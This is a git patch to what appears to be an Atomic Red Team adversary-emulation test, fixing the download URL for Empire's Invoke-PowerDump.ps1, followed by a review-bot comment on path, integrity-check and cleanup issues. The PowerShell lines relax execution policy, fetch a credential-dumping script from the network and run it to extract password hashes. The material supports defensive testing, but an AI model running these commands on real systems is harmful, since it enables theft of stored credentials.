From 730a62b9779cff7f206e1725fa01f424f01a2ac2 Mon Sep 17 00:00:00 2001
From: kpsmiley23
Date: Thu, 3 Sep 2020 17:48:52 -0400
Subject: [PATCH] Update T1003.002.yaml (#1212) Request raw Invoke-PowerDump.ps1 instead of repository page
---
 atomics/T1003.002/T1003.002.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index 181c1256..c6675750 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -88,7 +88,7 @@ atomic_tests:
 command: |-
 Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
 Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
- Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
+ Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
 Import-Module .\PowerDump.ps1
 Invoke-PowerDump
 name: powershell
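Review bot: The download on the changed line writes to `$Env:Temp\PowerDump.ps1`, but the following context line imports `.\PowerDump.ps1` relative to the current directory, so the two only agree when the test happens to run from the temp directory; `Import-Module "$Env:Temp\PowerDump.ps1"` would make the path explicit. The download also has no failure or content check before the import, which is how the earlier HTML-page URL went unnoticed; adding `-ErrorAction Stop` to the `Invoke-Webrequest` call, or comparing `Get-FileHash` output against a recorded hash for the pinned commit, would make the test fail loudly instead. Nothing in the visible lines removes the script from the temp directory afterwards, though a cleanup step may exist outside the hunk. The `Write-Host` banner mentions disabling Defender real-time monitoring while no such step appears in these lines, which could mislead anyone correlating the test output with telemetry.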